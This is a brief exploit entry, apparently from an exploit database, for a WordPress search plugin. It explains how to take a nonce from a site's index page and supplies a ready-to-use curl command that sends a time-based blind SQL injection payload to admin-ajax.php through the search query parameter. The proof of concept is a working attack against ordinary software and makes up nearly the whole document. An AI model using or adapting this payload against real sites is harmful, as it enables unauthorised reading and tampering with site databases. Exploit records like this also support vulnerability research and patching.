Share
## https://sploitus.com/exploit?id=WPEX-ID:E2DCC76C-65AC-4CD6-A5C9-6D813B5AC26D
Extract the nonce from the index page (search for "wp_autosearch_config", look for the "nonce" field)

Invoke the following curl command, with the nonce in place, to induce a 5 second sleep:

time curl -i 'https://example.com/wp-admin/admin-ajax.php' \
    --data 'action=wi_get_search_results&security=NONCE&q=123" AND (SELECT 1 FROM (SELECT(SLEEP(5)))HIdl)-- CmWf'